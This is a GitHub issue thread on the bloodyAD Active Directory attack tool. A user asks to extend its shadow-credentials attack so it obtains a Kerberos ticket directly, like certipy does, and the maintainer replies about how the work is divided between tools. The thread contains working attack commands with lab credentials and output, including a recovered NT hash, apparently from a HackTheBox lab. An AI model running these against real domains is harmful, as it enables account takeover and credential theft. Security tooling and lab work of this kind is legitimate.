search

CravateRouge / bloodyAD

BloodyAD is an Active Directory Privilege Escalation Framework
MIT License
1.12k stars 112 forks source link

Enhancement: shadowCredentials #48

Open 0xGreen opened 1 week ago

0xGreen commented 1 week ago

Wondering if it is possible to enhance the shadowCredential attack to remove the use of another tool?

bloodyAD -d absolute.htb --host dc.absolute.htb -k -u m.lovegod -p 'AbsoluteLDAP2022!' add shadowCredentials winrm_user
[+] KeyCredential generated with following sha256 of RSA key: 14835400bcc0ed3199d6b17edb829ef94c31fd45379028d3267d13ec6010465c
No outfile path was provided. The certificate(s) will be stored with the filename: FNoxGjcN
[+] Saved PEM certificate at path: FNoxGjcN_cert.pem
[+] Saved PEM private key at path: FNoxGjcN_priv.pem
A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Run the following command to obtain a TGT:
python3 PKINITtools/gettgtpkinit.py -cert-pem FNoxGjcN_cert.pem -key-pem FNoxGjcN_priv.pem absolute.htb/winrm_user FNoxGjcN.ccache

So, the attack is a success but need another tool PKINITtools to get the TGT.

If it is possible to implement something like what certipy did would be awesome, it perform the same attack and provide TGT. (In the past, i guess PKINITtools was required for certipy as well)

certipy shadow auto -target dc.absolute.htb -account winrm_user -k -u m.lovegod@absolute.htb -p 'AbsoluteLDAP2022!'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '65f2b4c3-f4ef-406b-6d25-e90c9d6d5bc7'
[*] Adding Key Credential with device ID '65f2b4c3-f4ef-406b-6d25-e90c9d6d5bc7' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '65f2b4c3-f4ef-406b-6d25-e90c9d6d5bc7' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: winrm_user@absolute.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_user.ccache'
[*] Trying to retrieve NT hash for 'winrm_user'
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2
CravateRouge commented 1 week ago

bloodyAD is specialized in Active Directory attacks while certipy is specialized in AD certificate attacks. That's why bloodyAD only do the first part of the exploit by writing into the AD and lets the kerberos part to another tool specialized for it.

But if you want to add this feature feel free to add it. I would ask you not to include more dependencies than what bloodyAD already has (so no impacket dependency, only minikerberos).